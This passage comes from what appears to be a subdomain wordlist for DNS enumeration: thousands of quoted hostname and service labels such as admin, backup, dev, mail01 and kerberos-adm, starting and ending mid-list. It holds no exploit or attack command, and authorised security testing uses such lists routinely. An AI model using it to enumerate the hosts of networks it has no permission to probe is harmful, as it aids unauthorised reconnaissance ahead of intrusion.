"22cust84", "22cust85", "22cust86", "22cust87", "22cust88", "22cust89", "22cust9", "22cust90", "22cust91", "22cust92", "22cust93", "22cust94", "22cust95", "22cust96", "22cust97", "22cust98", "22cust99", "23", "24", 
"25", "26", "2607", "27", "28", "29", "2a", "2b", "2c", "2cust1", "2cust10", "2cust11", "2cust12", "2cust13", "2cust14", "2cust15", "2cust16", "2cust17", "2cust18", "2cust19", "2cust2", "2cust20", "2cust21", "2cust22", "2cust23", "2cust24", "2cust25", "2cust26", "2cust27", "2cust28", "2cust29", "2cust3", "2cust30", "2cust31", "2cust32", "2cust33", "2cust34", "2cust35", "2cust36", "2cust37", "2cust38", "2cust39", "2cust4", "2cust40", "2cust41", "2cust42", "2cust43", "2cust44", "2cust45", "2cust46", "2cust47", "2cust48", "2cust49", "2cust5", "2cust50", "2cust51", "2cust52", "2cust53", "2cust54", "2cust55", "2cust56", "2cust57", "2cust58", "2cust59", "2cust6", "2cust60", "2cust61", "2cust62", "2cust63", "2cust64", "2cust65", "2cust66", "2cust67", "2cust68", "2cust69", "2cust7", "2cust70", "2cust71", "2cust72", "2cust73", "2cust74", "2cust75", "2cust76", "2cust77", "2cust78", "2cust79", "2cust8", "2cust80", "2cust81", "2cust82", "2cust83", "2cust84", "2cust85", "2cust86", "2cust87", "2cust88", "2cust89", "2cust9", "2cust90", "2cust91", "2cust92", "2cust93", "2cust94", "2cust95", "2cust96", "2cust97", "2cust98", "2cust99", "2d", "2e", "2f", "3", "30", "31", "31337", "32", "32983d48de4470", "33", "34", "35", "36", "37", "38", "39", "3a", "3b", "3c", "3com", "3cust1", "3cust10", "3cust11", "3cust12", "3cust13", "3cust14", "3cust15", "3cust16", "3cust17", "3cust18", "3cust19", "3cust2", "3cust20", "3cust21", "3cust22", "3cust23", "3cust24", "3cust25", "3cust26", "3cust27", "3cust28", "3cust29", "3cust3", "3cust30", "3cust31", "3cust32", "3cust33", "3cust34", "3cust35", "3cust36", "3cust37", "3cust38", "3cust39", "3cust4", "3cust40", "3cust41", "3cust42", "3cust43", "3cust44", "3cust45", "3cust46", "3cust47", "3cust48", "3cust49", "3cust5", "3cust50", "3cust51", "3cust52", "3cust53", "3cust54", "3cust55", "3cust56", "3cust57", "3cust58", "3cust59", "3cust6", "3cust60", "3cust61", "3cust62", "3cust63", "3cust64", "3cust65", "3cust66", "3cust67", "3cust68", "3cust69", 
"3cust7", "3cust70", "3cust71", "3cust72", "3cust73", "3cust74", "3cust75", "3cust76", "3cust77", "3cust78", "3cust79", "3cust8", "3cust80", "3cust81", "3cust82", "3cust83", "3cust84", "3cust85", "3cust86", "3cust87", "3cust88", "3cust89", "3cust9", "3cust90", "3cust91", "3cust92", "3cust93", "3cust94", "3cust95", "3cust96", "3cust97", "3cust98", "3cust99", "3d", "3e", "3f", "4", "40", "41", "42", "43", "44", "45", "46", "47", "48", "49", "4a", "4b", "4c", "4cust1", "4cust10", "4cust11", "4cust12", "4cust13", "4cust14", "4cust15", "4cust16", "4cust17", "4cust18", "4cust19", "4cust2", "4cust20", "4cust21", "4cust22", "4cust23", "4cust24", "4cust25", "4cust26", "4cust27", "4cust28", "4cust29", "4cust3", "4cust30", "4cust31", "4cust32", "4cust33", "4cust34", "4cust35", "4cust36", "4cust37", "4cust38", "4cust39", "4cust4", "4cust40", "4cust41", "4cust42", "4cust43", "4cust44", "4cust45", "4cust46", "4cust47", "4cust48", "4cust49", "4cust5", "4cust50", "4cust51", "4cust52", "4cust53", "4cust54", "4cust55", "4cust56", "4cust57", "4cust58", "4cust59", "4cust6", "4cust60", "4cust61", "4cust62", "4cust7", "4cust8", "4cust9", "4d", "4e", "4f", "5", "50", "51", "52", "53", "54", "55", "56", "57", "58", "59", "5a", "5b", "5c", "5d", "5e", "5f", "6", "60", "61", "62", "63", "64", "65", "66", "67", "68", "69", "6a", "6b", "6b1", "6c", "6d", "6e", "6f", "6net", "6test", "6to4", "7", "70", "71", "72", "73", "74", "75", "76", "77", "78", "79", "7a", "7b", "7c", "7d", "7e", "7f", "8", "80", "81", "82", "83", "84", "85", "86", "87", "88", "89", "8a", "8b", "8c", "8d", "8e", "8f", "9", "90", "91", "92", "93", "94", "95", "96", "97", "98", "99", "9a", "9b", "9c", "9d", "9e", "9f", "ILMI", "a", "a.auth-ns", "a0", "a01", "a02", "a1", "a10", "a11", "a12", "a13", "a14", "a15", "a16", "a2", "a20", "a21", "a3", "a4", "a5", "a6", "a7", "a8", "a9", "aa", "aaa", "aaaa", "ab", "abc", "about", "ac", "academ", "academico", "acc", "accelerator", "acceso", "access", "account", "accounting", 
"accounts", "ace", "achilles", "acid", "acs", "activestat", "ad", "ada", "adam", "adkit", "adm", "admin", "admin1", "admin2", "administracion", "administrador", "administrator", "administrators", "admins", "adns1", "ads", "adserver", "adsl", "ae", "ae-0", "ae-1", "ae-2", "ae0", "ae1", "af", "affiliate", "affiliates", "afiliados", "afs3-bos", "afs3-callback", "afs3-errors", "afs3-fileserver", "afs3-kaserver", "afs3-prserver", "afs3-rmtsys", "afs3-update", "afs3-vlserver", "afs3-volser", "ag", "agenda", "agent", "ah", "ai", "air", "aix", "aj", "ajax", "ak", "akamai", "al", "alabama", "alaska", "albuquerque", "alerts", "alex", "alfa", "alice", "allen", "alpha", "altair", "alterwind", "alumni", "am", "amanda", "amandaidx", "amarillo", "amber", "americas", "amon", "ams-core-1", "an", "anaheim", "analyzer", "andromeda", "angel", "anna", "announce", "announcements", "anonsvn", "anonymous", "antares", "antispam", "antivirus", "anubis", "ao", "ap", "ap1", "apache", "apache2-adamant", "apache2-argon", "apache2-blow", "apache2-bongo", "apache2-cabo", "apache2-cid", "apache2-daisy", "apache2-dap", "apache2-echo", "apache2-emu", "apache2-fritz", "apache2-fungi", "apache2-goo", "apache2-grog", "apache2-heavy", "apache2-hok", "apache2-ichiban", "apache2-igloo", "apache2-jiffy", "apache2-jolly", "apache2-kant", "apache2-kip", "apache2-linus", "apache2-lip", "apache2-moon", "apache2-mop", "apache2-nads", "apache2-noxim", "apache2-ogle", "apache2-olive", "apache2-pat", "apache2-prance", "apache2-quack", "apache2-quell", "apache2-rank", "apache2-sith", "apache2-twiddle", "apache2-udder", "apache2-vat", "apache2-whippit", "apache2-xenon", "apache2-yak", "apache2-zoo", "apc", "aphrodite", "api", "api1", "apollo", "app", "app01", "app1", "app2", "apple", "application", "applications", "apply", "apps", "appserver", "aq", "aqua", "aquarius", "ar", "ar01", "ar02", "ar2", "arachne", "aragorn", "archie", "archive", "archivos", "arcnet6", "arcsight", "ares", "argentina", "argon", "argos", 
"argus", "ari", "ariel", "aries", "arizona", "arkansas", "arlington", "art", "artemis", "arthur", "arwen", "as", "as-0", "as-2", "as0", "as01", "as1", "as2", "as400", "as54", "asa", "ash", "asia", "asp", "asr01", "asterisk", "asterix", "at", "athena", "atlanta", "atlantis", "atlas", "atm", "atom", "att", "atw", "atw6", "au", "auction", "aula", "aulas", "aurora", "austin", "auth", "auth-ns", "auth0", "auth00", "auth01", "auth02", "auth03", "auth1", "auth2", "auto", "autodiscover", "autorun", "av", "avalon", "avmail", "aw", "ax", "ay", "ayuda", "az", "b", "b.auth-ns", "b0", "b01", "b02", "b1", "b10", "b2", "b2b", "b2c", "b3", "b4", "b5", "b6", "b7", "b8", "b9", "ba", "bach", "back", "backbone", "backend", "backup", "backup01", "backup1", "backup2", "backups", "baker", "bakersfield", "balance", "balancer", "baltimore", "banana", "banking", "barney", "barracuda", "bart", "base", "batman", "bayarea", "bb", "bb1", "bbdd", "bbs", "bbs6", "bc", "bcast", "bce1", "bd", "bdc", "be", "bea", "bear", "beast", "bell", "belwue-gw", "bender", "berlin", "bes", "beta", "bf", "bg", "bgp", "bgpd", "bh", "bi", "biblioteca", "biff", "big", "bilbo", "bill", "billing", "bip1-gw", "biz", "biztalk", "bj", "bk", "bl", "black", "blackberry", "blackboard", "blackhole", "blacksun", "blade", "blazing", "blog", "blog6", "blogs", "blue", "bm", "bm0", "bm1", "bm2", "bm3", "bm4", "bn", "bnc", "bo", "bob", "bof", "boise", "bolsa", "bootpc", "bootps", "border", "border1", "border2", "boss", "boston", "bot", "boulder", "box", "boy", "bp", "bpcd", "bpdbm", "bprd", "bq", "br", "br0", "br1", "br2", "br3", "brain", "bravo", "brazil", "bridge", "britian", "broadband", "broadcast", "broadcast-via-ctc", "broker", "bronze", "brown", "bs", "bsd", "bsd0", "bsd01", "bsd02", "bsd1", "bsd2", "bt", "bt6", "bu", "bug", "buggalo", "bugs", "bugzilla", "build", "bulletins", "burn", "burner", "buscador", "business", "buy", "bv", "bw", "bwm", "bx", "by", "bz", "c", "c.auth-ns", "c0", "c1", "c2", "c3", "c4", "c5", "c6", 
"c7", "c8", "c9", "ca", "cache", "cache1", "cache2", "cacti", "cafe", "cag", "calendar", "california", "call", "callisto", "calvin", "calypso", "cam", "cam1", "camera", "campus", "canada", "canal", "canna", "canon", "carbon", "career", "careers", "carro", "cart", "cartman", "cas", "casper", "casse", "castor", "cat", "catalog", "catalogo", "catalogue", "cb", "cc", "ccxvii", "cd", "cd1", "cdburner", "cdma", "cdn", "ce", "ce0", "ce1", "ce2", "centos", "central", "cerberus", "ceres", "cert", "certificates", "certify", "certserv", "certsrv", "cf", "cfengine", "cfinger", "cg", "cgi", "cgw", "ch", "channel", "channels", "chaos", "chargen", "charlie", "charlotte", "charon", "chat", "chats", "chatserver", "check", "checkpoint", "cheetah", "cherry", "chi", "chicago", "chimera", "chris", "chronos", "ci", "ci53", "ci96", "cims", "cincinnati", "cisco", "cisco1", "cisco2", "citrix", "cj", "ck", "cl", "class", "classes", "classifieds", "classroom", "clearcase", "cleveland", "click1", "clicktrack", "client", "client1", "client2", "client3", "client4", "client5", "clientes", "clientrouter", "clients", "cll", "cloud", "club", "clubs", "cluster", "clusters", "clyde", "cm", "cm0", "cm1", "cm10", "cm11", "cm12", "cm13", "cm14", "cm15", "cm16", "cm17", "cm18", "cm19", "cm2", "cm20", "cm21", "cm22", "cm23", "cm24", "cm25", "cm26", "cm27", "cm28", "cm29", "cm3", "cm30", "cm31", "cm32", "cm33", "cm34", "cm35", "cm36", "cm37", "cm38", "cm39", "cm4", "cm40", "cm41", "cm42", "cm43", "cm44", "cm45", "cm46", "cm47", "cm48", "cm49", "cm5", "cm50", "cm51", "cm52", "cm53", "cm54", "cm55", "cm56", "cm57", "cm58", "cm59", "cm6", "cm60", "cm61", "cm62", "cm63", "cm64", "cm65", "cm66", "cm67", "cm68", "cm69", "cm7", "cm70", "cm71", "cm72", "cm73", "cm74", "cm75", "cm76", "cm77", "cm78", "cm79", "cm8", "cm80", "cm81", "cm82", "cm83", "cm84", "cm85", "cm86", "cm87", "cm88", "cm89", "cm9", "cm90", "cm91", "cm92", "cm93", "cm94", "cm95", "cm96", "cm97", "cm98", "cm99", "cmail", "cmip-agent", "cmip-man", 
"cms", "cn", "cns1", "cns2", "co", "cobalt", "cobra", "cocoa", "codasrv", "codasrv-se", "code", "coldfusion", "colo", "colo0-gw", "colombus", "colorado", "columbus", "com", "comment", "commerce", "commerceserver", "communigate", "community", "compaq", "compras", "con", "concentrator", "condor", "conf", "conference", "conferencing", "confidential", "connect", "connecticut", "consola", "console", "constellation", "consult", "consultant", "consultants", "consulting", "consumer", "contact", "content", "contracts", "control", "controller", "cook", "copper", "core", "core0", "core01", "core1", "core2", "corona", "corp", "corpmail", "corporate", "correio", "correo", "correoweb", "cortafuegos", "counterstrike", "courier", "courses", "cp", "cpanel", "cpe", "cph-cr1", "cpr1", "cq", "cr", "cr0", "cr1", "cr2", "cr3", "cricket", "crm", "crs", "crystal", "cs", "cs0", "cs1", "cs2", "csg", "csnet-ns", "cso", "css", "ct", "cu", "cube", "curie", "cust", "cust1", "cust10", "cust100", "cust101", "cust102", "cust103", "cust104", "cust105", "cust106", "cust107", "cust108", "cust109", "cust11", "cust110", "cust111", "cust112", "cust113", "cust114", "cust115", "cust116", "cust117", "cust118", "cust119", "cust12", "cust120", "cust121", "cust122", "cust123", "cust124", "cust125", "cust126", "cust13", "cust14", "cust15", "cust16", "cust17", "cust18", "cust19", "cust2", "cust20", "cust21", "cust22", "cust23", "cust24", "cust25", "cust26", "cust27", "cust28", "cust29", "cust3", "cust30", "cust31", "cust32", "cust33", "cust34", "cust35", "cust36", "cust37", "cust38", "cust39", "cust4", "cust40", "cust41", "cust42", "cust43", "cust44", "cust45", "cust46", "cust47", "cust48", "cust49", "cust5", "cust50", "cust51", "cust52", "cust53", "cust54", "cust55", "cust56", "cust57", "cust58", "cust59", "cust6", "cust60", "cust61", "cust62", "cust63", "cust64", "cust65", "cust66", "cust67", "cust68", "cust69", "cust7", "cust70", "cust71", "cust72", "cust73", "cust74", "cust75", "cust76", "cust77", "cust78", 
"cust79", "cust8", "cust80", "cust81", "cust82", "cust83", "cust84", "cust85", "cust86", "cust87", "cust88", "cust89", "cust9", "cust90", "cust91", "cust92", "cust93", "cust94", "cust95", "cust96", "cust97", "cust98", "cust99", "customer", "customers", "customs", "cv", "cvs", "cvspserver", "cw", "cx", "cy", "cyborgs", "cyclops", "cygnus", "cz", "d", "d0", "d1", "d1-0", "d10", "d11", "d12", "d13", "d14", "d15", "d16", "d17", "d18", "d19", "d2", "d20", "d21", "d22", "d23", "d24", "d25", "d26", "d27", "d28", "d29", "d3", "d30", "d31", "d32", "d33", "d34", "d35", "d36", "d37", "d38", "d39", "d4", "d40", "d41", "d42", "d43", "d44", "d45", "d46", "d47", "d48", "d49", "d5", "d50", "d51", "d52", "d53", "d54", "d55", "d56", "d57", "d58", "d59", "d6", "d60", "d61", "d62", "d63", "d64", "d65", "d66", "d67", "d68", "d69", "d7", "d70", "d71", "d72", "d73", "d74", "d75", "d76", "d77", "d78", "d79", "d8", "d80", "d81", "d82", "d83", "d84", "d85", "d86", "d87", "d88", "d89", "d9", "d90", "d91", "d92", "d93", "d94", "d95", "d96", "d97", "d98", "d99", "da", "daap", "daisy", "dallas", "darwin", "dashboard", "data", "database", "database01", "database02", "database1", "database2", "databases", "datametrics", "datastore", "datatracker", "datos", "david", "davinci", "daytime", "db", "db0", "db01", "db02", "db03", "db1", "db2", "db3", "dbs", "dc", "dc1", "dc2", "dd", "dds", "de", "de-cix", "dealers", "debian", "dec", "decix", "dedicated", "def", "default", "defiant", "deimos", "delaware", "dell", "delta", "delta1", "demeter", "demo", "demo2", "demon", "demon-gw", "demonstration", "demos", "demostration", "deneb", "denver", "depot", "des", "desarrollo", "descargas", "design", "designer", "desktop", "destiny", "detroit", "deutschland", "dev", "dev0", "dev01", "dev1", "dev2", "deve", "devel", "develop", "developer", "developers", "development", "device", "devserver", "devsql", "df", "dg", "dh", "dhcp", "dhcp-pool", "dhcp01", "dhcp02", "dhcp1", "dhcp10", "dhcp11", "dhcp12", "dhcp13", 
"dhcp14", "dhcp15", "dhcp16", "dhcp17", "dhcp18", "dhcp19", "dhcp2", "dhcp20", "dhcp21", "dhcp22", "dhcp23", "dhcp24", "dhcp25", "dhcp26", "dhcp27", "dhcp28", "dhcp29", "dhcp3", "dhcp4", "dhcp5", "dhcp6", "dhcp7", "dhcp8", "dhcp9", "di", "di1", "dial", "dialin", "dialup", "diamond", "diana", "diary", "dict", "digital", "dilbert", "dino", "dione", "dir", "dirac", "dircproxy", "direct", "directory", "disc", "discard", "disco", "discovery", "discuss", "discussion", "discussions", "disk", "disney", "dist", "dist02", "distcc", "distmp3", "distributer", "distributers", "dj", "dk", "dl", "dlv", "dm", "dmail", "dms", "dmz", "dmz-gw", "dn", "dnews", "dns", "dns-2", "dns-a", "dns-b", "dns-cache1", "dns-cache2", "dns0", "dns00", "dns01", "dns02", "dns03", "dns1", "dns2", "dns3", "dns4", "dns6", "dnsa", "dnsb", "dnscache1", "dnscache2", "do", "doc", "docs", "documentacion", "documentos", "dolphin", "domain", "domain-controller", "domaincontroller", "domains", "dominio", "domino", "dominoweb", "donald", "doom", "download", "downloads", "downtown", "dp", "dq", "dr", "draal", "drac", "draco", "dragon", "drupal", "ds", "ds1", "dsl", "dt", "du", "dv", "dw", "dx", "dy", "dyn", "dynamic", "dynip", "dz", "e", "e-com", "e-commerce", "e0", "e0-0", "e1", "e2", "e22", "e24", "e3", "e4", "e5", "e6", "e7", "e8", "e9", "ea", "eaccess", "eagle", "earth", "east", "eb", "ec", "echo", "eclipse", "ecom", "ecommerce", "ed", "edge", "edge1", "edge2", "edi", "edu", "education", "edward", "ee", "ef", "efnet", "eg", "eh", "ei", "einstein", "ej", "ejemplo", "ejemplos", "ek", "eklogin", "el", "elearning", "elpaso", "em", "email", "email1", "email2", "emerald", "employees", "empresa", "empresas", "ems", "en", "en01", "enable", "enbd-cstatd", "enbd-sstatd", "enc", "eng", "eng01", "eng1", "engine", "engineer", "engineering", "enigma", "enrutador", "enterprise", "enum", "eo", "eos", "ep", "epp", "eprints", "epsilon", "epzilon", "eq", "er", "eris", "eros", "erp", "es", "esd", "eservice", "esm", "espanol", 
"estadisticas", "esx", "esx1", "et", "eta", "eth0", "eth1", "eth2", "ethernet", "eu", "euler", "eunet-gw", "eunomia", "europa", "europe", "ev", "eva", "eve", "eventos", "events", "everest", "ew", "ex", "ex1", "example", "examples", "excalibur", "exch", "exchange", "exchange1", "exchange2", "exec", "exeter", "exit", "exmail", "ext", "extern", "external", "extra", "extranet", "ey", "ez", "ezproxy", "f", "f0", "f0-0", "f1", "f2", "f3", "f4", "f5", "f6", "f7", "f8", "f9", "fa", "fa-0-0", "fa0", "fa0-0", "fa0-1", "falcon", "faraday", "farm", "fastethernet0-0", "faststats", "fatserv", "fax", "fb", "fc", "fd", "fe", "fe0", "fe0-0", "fe0-1", "fe1", "fe1-0", "fe2", "fe2-0", "feedback", "feeds", "felix", "fermi", "ff", "fg", "fh", "fi", "fiberlink", "fido", "field", "file", "files", "filesender", "fileserv", "fileserver", "filestore", "filter", "finance", "find", "finger", "fire", "firewall", "fix", "fixes", "fj", "fk", "fl", "flash", "florida", "flow", "fm", "fn", "fo", "folders", "font-service", "foobar", "formacion", "forms", "foro", "foros", "fortworth", "forum", "forums", "foto", "fotos", "foundry", "fourier", "fox", "foxtrot", "fp", "fq", "fr", "france", "frank", "franklin", "fred", "free", "freebsd", "freebsd0", "freebsd01", "freebsd02", "freebsd1", "freebsd2", "freedommail", "freemail", "freeware", "fresno", "frodo", "front", "frontdesk", "frox", "fry", "fs", "fs1", "fs2", "fsp", "ft", "ftb", "ftp", "ftp-", "ftp-data", "ftp0", "ftp1", "ftp2", "ftp3", "ftp6", "ftpd", "ftps", "ftps-data", "ftpserver", "fu", "fuji", "fun", "fv", "fw", "fw-1", "fw0", "fw00", "fw01", "fw02", "fw03", "fw1", "fw1-gw", "fw2", "fw3", "fwsm", "fwsm0", "fwsm01", "fwsm1", "fx", "fy", "fz", "g", "g0-26", "g1", "ga", "gaia", "galatea", "galaxy", "galeria", "galerias", "galerie", "galileo", "galleries", "gallery", "game", "games", "gameserver", "gamma", "gandalf", "ganymede", "garfield", "gate", "gate1", "gate2", "gatekeeper", "gateway", "gateway1", "gateway2", "gauss", "gb", "gc", "gd", "gdomap", 
"gds_db", "ge", "ge-0", "ge-0-0-0-0", "ge0", "ge0-0", "ge0-1", "ge0-2", "ge1", "ge1-0", "ge11", "ge13", "ge2-0", "geb", "gemini", "general", "genesis", "gentoo", "geo", "george", "georgia", "ger", "germany", "get", "gf", "gg", "ggz", "gh", "ghost", "gi", "gi-0-1", "gi0-0", "gi0-1", "gi0-2", "gi2-0", "gig0-1", "gig0-2", "gig0-3", "gigabitethernet0", "gigabitethernet1", "gige-g0-1", "gige-gbge0", "gilford", "gimli", "gis", "git", "gizmo", "gj", "gk", "gl", "glendale", "global", "gm", "gmail", "gn", "gnu", "gnutella-rtr", "gnutella-svc", "go", "gold", "goldmine", "golf", "gollum", "gonzo", "goofy", "gopher", "gp", "gps", "gpsd", "gq", "gr", "green", "group", "groups", "groupwise", "gs", "gsx", "gt", "gu", "guardian", "guest", "guia", "guide", "gv", "gw", "gw-ipv6", "gw0", "gw01", "gw02", "gw1", "gw2", "gw3", "gw4", "gw6", "gx", "gy", "gz", "h", "h0", "h1", "h10", "h11", "h12", "h13", "h14", "h15", "h16", "h17", "h18", "h19", "h2", "h20", "h21", "h22", "h23", "h24", "h25", "h26", "h27", "h28", "h29", "h3", "h30", "h31", "h32", "h33", "h34", "h35", "h36", "h37", "h38", "h39", "h4", "h40", "h41", "h42", "h43", "h44", "h45", "h46", "h47", "h48", "h49", "h5", "h50", "h51", "h52", "h53", "h54", "h55", "h56", "h57", "h58", "h59", "h6", "h60", "h61", "h62", "h63", "h64", "h65", "h66", "h67", "h68", "h69", "h7", "h70", "h71", "h72", "h73", "h74", "h75", "h76", "h77", "h78", "h79", "h8", "h80", "h81", "h82", "h83", "h84", "h85", "h86", "h87", "h88", "h89", "h9", "h90", "h91", "h92", "h93", "h94", "h95", "h96", "h97", "h98", "h99", "ha", "ha1", "ha2", "hades", "hal", "halflife", "hammer", "happy", "haproxy", "has", "hat", "hawaii", "hawk", "hb", "hc", "hd", "he", "helene", "helios", "helium", "helix", "hello", "help", "helpdesk", "helponline", "henry", "hera", "heracles", "hercules", "hermes", "hestia", "hf", "hg", "hh", "hi", "hidden", "hj", "hk", "hkp", "hl", "hm", "hmmp-ind", "hn", "ho", "hobbes", "hobby-gw", "hollywood", "home", "homebase", "homepage", "homer", "honeypot", 
"honolulu", "hop", "horus", "host", "host-1", "host-10", "host-11", "host-12", "host-13", "host-14", "host-15", "host-16", "host-17", "host-18", "host-19", "host-2", "host-20", "host-21", "host-22", "host-23", "host-24", "host-25", "host-26", "host-27", "host-28", "host-29", "host-3", "host-30", "host-31", "host-32", "host-33", "host-34", "host-35", "host-36", "host-37", "host-38", "host-39", "host-4", "host-40", "host-41", "host-42", "host-43", "host-44", "host-45", "host-46", "host-47", "host-48", "host-49", "host-5", "host-50", "host-51", "host-52", "host-53", "host-54", "host-55", "host-56", "host-57", "host-58", "host-59", "host-6", "host-60", "host-61", "host-62", "host-63", "host-64", "host-65", "host-66", "host-67", "host-68", "host-69", "host-7", "host-70", "host-71", "host-72", "host-73", "host-74", "host-75", "host-76", "host-77", "host-78", "host-79", "host-8", "host-80", "host-81", "host-82", "host-83", "host-84", "host-85", "host-86", "host-87", "host-88", "host-89", "host-9", "host-90", "host-91", "host-92", "host-93", "host-94", "host-95", "host-96", "host-97", "host-98", "host-99", "host0", "host01", "host02", "host03", "host04", "host05", "host06", "host07", "host08", "host09", "host1", "host10", "host11", "host12", "host13", "host14", "host15", "host16", "host17", "host18", "host19", "host2", "host20", "host21", "host22", "host23", "host24", "host25", "host26", "host27", "host28", "host29", "host3", "host30", "host31", "host32", "host33", "host34", "host35", "host36", "host37", "host38", "host39", "host4", "host40", "host41", "host42", "host43", "host44", "host45", "host46", "host47", "host48", "host49", "host5", "host50", "host51", "host52", "host53", "host54", "host55", "host56", "host57", "host58", "host59", "host6", "host60", "host61", "host62", "host63", "host64", "host65", "host66", "host67", "host68", "host69", "host7", "host70", "host71", "host72", "host73", "host74", "host75", "host76", "host77", "host78", "host79", "host8", "host80", 
"host81", "host82", "host83", "host84", "host85", "host86", "host87", "host88", "host89", "host9", "host90", "host91", "host92", "host93", "host94", "host95", "host96", "host97", "host98", "host99", "hosted", "hosted-by", "hosting", "hosting1", "hosting2", "hostmon", "hostnames", "hotel", "hotjobs", "hotspot", "houstin", "houston", "howto", "hp", "hpov", "hq", "hr", "hs", "hsrp", "ht", "http", "https", "hu", "hub", "humanresources", "hund", "hv", "hw", "hwmaint", "hx", "hy", "hydra", "hydrogen", "hylafax", "hyperion", "hypernova", "hz", "i", "ia", "iana", "ias", "iax", "ib", "ibm", "ibmdb", "ic", "icarus", "ice", "icecube", "icons", "icpv2", "ict", "id", "ida", "idaho", "idefix", "idp", "ids", "ie", "if", "if-0-0-0", "if-10-0-0", "if-2-0-0", "ifolder", "ig", "ih", "ii", "iis", "ij", "ik", "il", "illinois", "illusion", "ilo", "im", "image", "images", "imail", "imap", "imap3d", "imap4", "imapd", "imaps", "img", "img0", "img01", "img02", "imgs", "imogen", "ims", "imsp", "in", "in1", "inbound", "inc", "include", "incoming", "india", "indiana", "indianapolis", "indigo", "inet", "inferno", "info", "info1", "info2", "informix", "ingreslock", "inmuebles", "ins2", "inside", "install", "int", "intern", "internal", "international", "internet", "internet2", "interno", "intl", "intra", "intranet", "invalid", "inventory", "investor", "investors", "io", "iota", "iowa", "ip", "ip00", "ip01", "ip02", "ip03", "ip04", "ip05", "ip06", "ip07", "ip1", "ip10", "ip11", "ip12", "ip13", "ip14", "ip15", "ip16", "ip17", "ip18", "ip19", "ip2", "ip20", "ip21", "ip22", "ip23", "ip24", "ip25", "ip26", "ip27", "ip28", "ip29", "ip3", "ip30", "ip31", "ip32", "ip33", "ip34", "ip35", "ip36", "ip37", "ip38", "ip39", "ip4", "ip40", "ip41", "ip42", "ip43", "ip44", "ip45", "ip46", "ip47", "ip48", "ip49", "ip5", "ip50", "ip51", "ip52", "ip53", "ip54", "ip55", "ip56", "ip57", "ip58", "ip59", "ip6", "ip60", "ip61", "ip62", "ip63", "ip64", "ip65", "ip66", "ip67", "ip68", "ip69", "ip6test", "ip7", "ip70", 
"ip71", "ip72", "ip73", "ip74", "ip75", "ip76", "ip77", "ip78", "ip79", "ip8", "ip80", "ip81", "ip82", "ip83", "ip84", "ip85", "ip86", "ip87", "ip88", "ip89", "ip9", "ip90", "ip91", "ip92", "ip93", "ip94", "ip95", "ip96", "ip97", "ip98", "ip99", "ipad", "iphone", "iplanet", "ipmi", "ipmonitor", "ipod", "ipp", "iprop", "ipsec", "ipsec-gw", "iptv", "ipv4", "ipv6", "ipv6-gw", "ipv6-router", "ipv6.teredo", "ipv6cam", "ipv6forum", "ipv6gw", "ipv6test", "ipv6tv", "ipx", "iq", "ir", "irc", "irc6", "ircd", "ircs", "ircserver", "ireland", "iris", "iron", "ironport", "irssi", "irvine", "irving", "is", "isa", "isaiah", "isakmp", "isaserv", "isaserver", "isdnlog", "isis", "isisd", "isl-hub-01", "isl-hub-1", "ism", "iso-tsap", "isp", "israel", "issues", "ist", "isync", "it", "italy", "itchy", "its", "iu", "iv", "iw", "ix", "ix-2-2", "iy", "iz", "j", "j1", "j2", "ja", "jabber", "jack", "jade", "jaguar", "james", "janus", "japan", "java", "jb", "jc", "jd", "je", "jedi", "jerry", "jest", "jf", "jg", "jh", "ji", "jira", "jj", "jk", "jl", "jm", "jn", "jo", "jobs", "joe", "john", "jp", "jq", "jr", "jrun", "js", "jt", "ju", "juegos", "juliet", "juliette", "juniper", "juno", "jupiter", "jv", "jw", "jx", "jy", "jz", "k", "k1", "k2", "ka", "kamanda", "kansas", "kansascity", "kappa", "kazaa", "kb", "kc", "kd", "kdc1", "ke", "kentucky", "kepler", "kerberos", "kerberos-adm", "kerberos4", "kerberos_master", "kermit", "kernel", "keynote", "keys", "keyserver", "kf", "kg", "kh", "ki", "kilo", "king", "kirk", "kiwi", "kj", "kk", "kl", "klogin", "km", "kn", "knetd", "knowledgebase", "knoxville", "ko", "koala", "koe", "korea", "kp", "kpasswd", "kpop", "kq", "kr", "krb_prop", "krbupdate", "kronos", "krypton", "ks", "kshell", "kst-core-1", "kt", "ku", "kv", "kvm", "kw", "kx", "ky", "kz", "l", "l0", "l1", "l2f", "la", "lab", "lab1", "lab2", "laboratories", "laboratorio", "laboratory", "labs", "laforge", "lambda", "lan", "lan-gate", "laptop", "larry", "laser", "laserjet", "lasvegas", "launch", "lb", 
"lb01", "lb1", "lb2", "lc", "ld", "ldap", "ldap1", "ldap2", "ldaps", "le", "learn", "legacy", "legal", "legolas", "leng", "lenny", "leo", "leopard", "lf", "lg", "lh", "li", "lib", "libra", "library", "license", "light", "lim-core-1", "lima", "lincoln", "link", "linus", "linux", "linux0", "linux01", "linux02", "linux1", "linux2", "linuxconf", "lion", "lisa", "list", "lista", "listes", "lists", "listserv", "listserver", "lithium", "live", "lj", "lk", "ll", "llb1", "lm", "lms", "ln", "lo", "lo-0", "lo-0-0", "lo-1", "lo-22", "lo-6", "lo0", "lo0-0", "lo1", "lo2", "load", "loadbalancer", "loc-srv", "local", "localhost", "locsrv", "log", "log-server", "log0", "log01", "log02", "log1", "log2", "logfile", "logfiles", "logger", "logging", "loghost", "login", "logon", "logs", "loki", "london", "longbeach", "loop0", "loopback-0", "loopback-1", "loopback0", "loopback1", "lorien", "losangeles", "lotus", "lotusnote", "louisiana", "lp", "lq", "lr", "ls", "lt", "lu", "lucy", "luke", "luna", "lv", "lw", "lx", "lxxxix", "ly", "lync", "lynx", "lyris", "lz", "m", "m-net", "m1", "m10", "m11", "m12", "m13", "m2", "m3", "m4", "m5", "m6", "m7", "m7i", "ma", "mac", "mac1", "mac10", "mac11", "mac2", "mac3", "mac4", "mac5", "mach", "macintosh", "macos", "macosx", "madrid", "maduin", "mag", "maggie", "magic", "mail", "mail-gw", "mail-in", "mail-out", "mail0", "mail01", "mail02", "mail03", "mail04", "mail05", "mail06", "mail07", "mail1", "mail10", "mail11", "mail12", "mail13", "mail14", "mail15", "mail16", "mail17", "mail18", "mail19", "mail2", "mail20", "mail21", "mail22", "mail23", "mail24", "mail25", "mail26", "mail27", "mail28", "mail29", "mail3", "mail30", "mail31", "mail32", "mail33", "mail4", "mail5", "mail6", "mail7", "mail8", "mail9", "maila", "mailb", "mailbox", "mailer", "mailer1", "mailer2", "mailgate", "mailgate1", "mailgate2", "mailgw", "mailgw1", "mailgw2", "mailgw3", "mailhost", "mailhost1", "mailhost2", "mailhub", "mailin", "mailing", "maillist", "maillists", "mailman", 
